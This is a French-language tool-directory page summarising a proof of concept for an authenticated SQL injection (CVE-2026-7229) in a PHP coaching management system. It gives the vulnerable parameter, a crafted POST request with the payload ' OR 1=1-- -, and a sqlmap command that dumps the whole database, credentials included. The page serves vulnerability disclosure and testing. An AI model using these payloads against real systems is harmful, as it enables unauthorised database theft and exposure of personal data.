Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-7229-SQLI — Preuve de concept pour une injection SQL authentifiée dans Coaching Management System, démontrant le dump de la base de données via le paramètre non assaini `complaintreply`. | Kitploit
Outils/GitHubGitHub/xmyronn/cve-2026-7229-sqli
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionSécurité des Bases de Données
GitHubxmyronn/cve-2026-7229-sqli

CVE-2026-7229-SQLI

Preuve de concept pour une injection SQL authentifiée dans Coaching Management System, démontrant le dump de la base de données via le paramètre non assaini `complaintreply`.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Injection SQL authentifiée dans le système de gestion de coaching permettant l'extraction complète de la base de données

Description

Une vulnérabilité d'injection SQL existe dans le système de gestion de coaching en PHP. Le paramètre complaintreply dans la fonctionnalité de réponse de l'administrateur n'est pas correctement assaini avant d'être utilisé dans les requêtes SQL. Un attaquant authentifié (Admin) peut injecter des requêtes SQL malveillantes, conduisant à l'extraction complète de la base de données.


Détails de la vulnérabilité

  • Type : Injection SQL (CWE-89 : Neutralisation incorrecte des éléments spéciaux utilisés dans une commande SQL)
  • Impact : Extraction de la base de données / Divulgation d'identifiants
  • Fichier concerné : /cims/modules/admin/reply.php
  • Paramètre concerné : complaintreply
  • Vecteur d'attaque : À distance, authentifié (Admin)
  • Base de données : MySQL (MariaDB)

  • Éditeur

    code-projects.org


    Produit

    Système de gestion de coaching en PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/


    Version

    Inconnue (Testé sur la dernière version disponible en avril 2026)


    Preuve de concept (Résumé)

    1. L'étudiant soumet une réclamation Screenshot 2026-04-10 225755

    2. L'administrateur ouvre la réclamation et accède à la fonctionnalité de réponse

    POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded

    complaintreply=' OR 1=1-- -&submit=submit

    Screenshot 2026-04-10 225808
    1. Intercepter la requête via Burp Suite Screenshot 2026-04-10 225821

    2. Injecter la charge utile :

      root@kitploit:~
      '
      
    Screenshot 2026-04-10 225844
    root@kitploit:~
    Erreur SQL observée
    

    7. Confirmer l'injection :

    root@kitploit:~
    ' OR 1=1-- -
    
    Screenshot 2026-04-10 225900
    1. Extraire la base de données en utilisant :

      root@kitploit:~
      sqlmap -r sqli.txt --dump
      
    Screenshot 2026-04-10 235219

    Injection confirmée via les méthodes basées sur les erreurs, booléennes, et l'exploitation automatisée avec sqlmap

    Impact

    • Extraction complète de la base de données possible
    • Identifiants stockés en clair exposés
    • Compromission totale des données de l'application
    • Contournement de l'authentification et élévation de privilèges via l'extraction d'identifiants
    • Extraction complète de la base de données réalisée, y compris la table des utilisateurs (identifiants), les données personnelles des étudiants, les dossiers des enseignants et l'historique des réclamations.

    Sévérité : CRITIQUE

    Télécharger l’outil